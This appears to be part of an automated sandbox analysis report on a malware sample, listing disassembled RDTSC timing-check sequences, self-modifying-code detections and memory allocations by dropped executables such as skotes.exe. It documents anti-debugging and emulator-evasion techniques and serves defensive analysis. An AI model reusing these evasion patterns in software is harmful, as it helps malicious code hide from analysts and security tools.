Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50408CF second address: 5040925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F19A4DEDF34h 0x00000014 and si, 1EA8h 0x00000019 jmp 00007F19A4DEDF2Bh 0x0000001e popfd 0x0000001f jmp 00007F19A4DEDF38h 0x00000024 popad 0x00000025 test esi, esi 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov cx, 5023h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040925 second address: 5040976 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19A4F65044h 0x0000000b popad 0x0000000c je 00007F1A172CAA84h 0x00000012 jmp 00007F19A4F65040h 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F19A4F65047h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040976 second address: 5040A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F19A4DEDF2Dh 0x0000000f je 00007F1A1715393Ch 0x00000015 pushad 0x00000016 push esi 0x00000017 pushfd 0x00000018 jmp 00007F19A4DEDF33h 0x0000001d sub ecx, 025C996Eh 0x00000023 jmp 00007F19A4DEDF39h 0x00000028 popfd 0x00000029 pop ecx 0x0000002a mov bx, 9564h 0x0000002e popad 0x0000002f test byte ptr [77436968h], 00000002h 0x00000036 jmp 00007F19A4DEDF33h 0x0000003b jne 00007F1A171538F3h 0x00000041 jmp 00007F19A4DEDF36h 0x00000046 mov edx, dword ptr [ebp+0Ch] 0x00000049 pushad 0x0000004a call 00007F19A4DEDF2Eh 0x0000004f pushad 0x00000050 popad 0x00000051 pop ecx 0x00000052 mov bx, 4624h 0x00000056 popad 0x00000057 push esp 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F19A4DEDF2Fh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040A31 second address: 5040A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65049h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F19A4F65043h 0x00000015 and eax, 36DE7C4Eh 0x0000001b jmp 00007F19A4F65049h 0x00000020 popfd 0x00000021 mov bx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040A8C second address: 5040ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 39h 0x00000005 mov ecx, 5AD9456Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov cl, dh 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F19A4DEDF35h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F19A4DEDF2Eh 0x0000001e push dword ptr [ebp+14h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F19A4DEDF37h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040ADF second address: 5040AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F65044h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040AF7 second address: 5040AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040B61 second address: 5040BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65041h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F19A4F6503Ch 0x00000011 sbb ecx, 5DC5F238h 0x00000017 jmp 00007F19A4F6503Bh 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 pop ebx 0x00000021 jmp 00007F19A4F65042h 0x00000026 mov esp, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040BB5 second address: 5040BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040BB9 second address: 5040BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040BBF second address: 5040C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4461h 0x00000007 pushfd 0x00000008 jmp 00007F19A4DEDF2Eh 0x0000000d or ax, 96F8h 0x00000012 jmp 00007F19A4DEDF2Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F19A4DEDF35h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050CF6 second address: 5050D29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65049h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F19A4F6503Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050D29 second address: 5050D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050D2F second address: 5050D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050AA1 second address: 5050AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050AA5 second address: 5050AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050AAB second address: 5050ACE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov cx, ECC9h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050ACE second address: 5050AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050AD4 second address: 5050AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D06CB second address: 50D06CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D06CF second address: 50D06D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D06D3 second address: 50D06E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov esi, 5931C377h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D06E7 second address: 50D06ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D06ED second address: 50D0709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D0709 second address: 50D070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50D070D second address: 50D0713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C08F1 second address: 50C08F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C08F7 second address: 50C0950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65043h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov cl, dh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F19A4F6503Fh 0x00000018 xor eax, 7B19636Eh 0x0000001e jmp 00007F19A4F65049h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0950 second address: 50C0956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0956 second address: 50C095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C095C second address: 50C0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0960 second address: 50C097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F19A4F6503Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C075B second address: 50C075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C075F second address: 50C0765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0765 second address: 50C078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov si, A587h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F19A4DEDF38h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C078C second address: 50C0792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0792 second address: 50C07B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F19A4DEDF34h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C07B1 second address: 50C07B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C07B7 second address: 50C07BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060279 second address: 506027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 506027F second address: 50602BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F19A4DEDF30h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F19A4DEDF2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50602BF second address: 50602D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F6503Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50602D1 second address: 50602FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, 15h 0x0000000f mov dh, D1h 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F19A4DEDF2Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0B85 second address: 50C0BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F19A4F65047h 0x00000008 pop ecx 0x00000009 mov dx, 18CCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 mov ecx, 435EE3CDh 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ax, 59EFh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0CF3 second address: 50C0CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50C0CF7 second address: 50C0D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070575 second address: 50705E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F19A4DEDF2Eh 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F19A4DEDF30h 0x00000017 push FE03581Dh 0x0000001c pushad 0x0000001d mov di, CBE2h 0x00000021 mov edx, 6E95C42Eh 0x00000026 popad 0x00000027 add dword ptr [esp], 793E67FBh 0x0000002e jmp 00007F19A4DEDF35h 0x00000033 push 5687EB51h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F19A4DEDF2Ah 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50705E9 second address: 50705EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50705EF second address: 50705F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50705F3 second address: 5070607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 21BF4551h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov esi, ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070607 second address: 5070664 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F19A4DEDF31h 0x00000008 add eax, 76E14DC6h 0x0000000e jmp 00007F19A4DEDF31h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F19A4DEDF30h 0x0000001c add ax, E668h 0x00000021 jmp 00007F19A4DEDF2Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov eax, dword ptr fs:[00000000h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070664 second address: 507066A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507066A second address: 50706CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 call 00007F19A4DEDF36h 0x00000015 pop edi 0x00000016 popad 0x00000017 mov dword ptr [esp], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F19A4DEDF39h 0x00000023 and ax, D346h 0x00000028 jmp 00007F19A4DEDF31h 0x0000002d popfd 0x0000002e mov eax, 45D5B1F7h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50706CF second address: 50706D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50706D5 second address: 50706D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50706D9 second address: 5070708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F19A4F65045h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070708 second address: 507070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507070E second address: 5070712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070712 second address: 507074B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F19A4DEDF34h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F19A4DEDF37h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507074B second address: 5070784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65049h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F19A4F65043h 0x00000012 mov si, F35Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070784 second address: 5070798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4DEDF30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070798 second address: 507079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507079C second address: 50707D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F19A4DEDF2Eh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, ebx 0x00000014 jmp 00007F19A4DEDF39h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50707D3 second address: 507082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19A4F65047h 0x00000008 pushfd 0x00000009 jmp 00007F19A4F65048h 0x0000000e sub si, 22E8h 0x00000013 jmp 00007F19A4F6503Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F19A4F6503Bh 0x00000025 mov ch, 59h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507082C second address: 5070853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F19A4DEDF2Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070853 second address: 50708EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E654h 0x00000007 mov edi, 2AFD13C0h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 push ebx 0x00000012 movzx ecx, bx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pushfd 0x00000018 jmp 00007F19A4F65049h 0x0000001d sbb eax, 08A44A76h 0x00000023 jmp 00007F19A4F65041h 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b mov eax, dword ptr [7743B370h] 0x00000030 pushad 0x00000031 jmp 00007F19A4F6503Dh 0x00000036 push ecx 0x00000037 pushad 0x00000038 popad 0x00000039 pop edi 0x0000003a popad 0x0000003b xor dword ptr [ebp-08h], eax 0x0000003e jmp 00007F19A4F65048h 0x00000043 xor eax, ebp 0x00000045 jmp 00007F19A4F65041h 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50708EB second address: 50708EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50708EF second address: 5070902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070902 second address: 5070925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070925 second address: 5070942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F65048h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070942 second address: 507097C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F19A4DEDF36h 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 pushad 0x00000012 mov esi, 53177A8Dh 0x00000017 mov ah, 32h 0x00000019 popad 0x0000001a mov dword ptr fs:[00000000h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov di, cx 0x00000026 mov edi, eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507097C second address: 5070A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19A4F65045h 0x00000008 pushfd 0x00000009 jmp 00007F19A4F65040h 0x0000000e and ax, 7838h 0x00000013 jmp 00007F19A4F6503Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F19A4F65044h 0x00000026 sbb ax, 7298h 0x0000002b jmp 00007F19A4F6503Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007F19A4F65046h 0x00000039 jmp 00007F19A4F65045h 0x0000003e popfd 0x0000003f rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 8ED412 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 968783 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 104D412 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 10C8783 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Special instruction interceptor: First address: 4259F4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Special instruction interceptor: First address: 4234B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Special instruction interceptor: First address: 5F1AB6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Special instruction interceptor: First address: 5D2595 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Special instruction interceptor: First address: 65BEA6 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Memory allocated: CD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Memory allocated: 2930000 memory reserve \| memory write watch
